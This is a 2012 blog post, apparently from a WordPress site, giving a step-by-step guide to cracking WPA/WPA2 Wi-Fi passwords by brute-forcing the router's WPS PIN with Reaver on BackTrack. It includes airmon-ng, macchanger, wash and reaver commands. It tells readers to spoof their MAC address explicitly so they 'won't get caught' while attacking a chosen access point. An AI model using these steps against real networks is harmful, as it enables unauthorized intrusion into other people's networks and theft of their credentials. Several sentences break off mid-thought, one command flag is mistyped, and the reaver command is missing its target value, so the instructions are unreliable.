Cracking Non-Dictionary WPA/WPA2 Passpharse

Posted: November 6, 2012 in Uncategorized

WPA/WPA2 password can be
cracked simply by capturing
WPA handshake and then
applying a dictionary attack on
them. If he passphrase is in the
dictionary then password will be
cracked, and this process may take
hours, in some cases in even days.
But what if password is not in
So here we will learn to crack
these passpharses
WPS:- Wi-Fi Protected Setup
(WPS; originally Wi-Fi Simple
Config) is a computing standard
that attempts to allow easy
establishment of a secure wireless
home network. By default this is
enabled in most of routers.
Using Reaver we will brute force
the AP’s WPS, attempting every
possible combination in order to
guess the AP’s 8 digit pin
number. Since the pin numbers
are all numeric, there are 10^8
(100,000,000) possible values for
any given pin number. However,
because the last digit of the pin is
a checksum value which
can be calculated based on the
previous 7 digits, that key space is
reduced to 10^7 (10,000,000)
possible values.
The key space is reduced even
further due to the fact that the
WPS authentication protocol cuts
the pin in half and validates each
half individually.
Reaver brute forces the first half
of the pin and then the second half
of the pin, meaning that the entire
key space for the WPS pin
number can be exhausted in
11,000 attempts.So here key
concept is that we can brute-force
that pin, and can get all the
credentials kept for Access Point
which can be any combination of
digits, special symbols
Let’s Start :
Boot your Backtrack :
Let’s we will change the mac
address of our network card so
that we won’t get caught
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55
ifconfig mon0 up
Now run the following the
command to get all the available
wash -1 mon0
Now choose your target and note
its bssid and issue the following
command replacing with

the targets bssid:

reaver -i mon0 -b -vv

Now wait until you Reaver brute

force’s the pin. Once its done,

you’ll have





Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s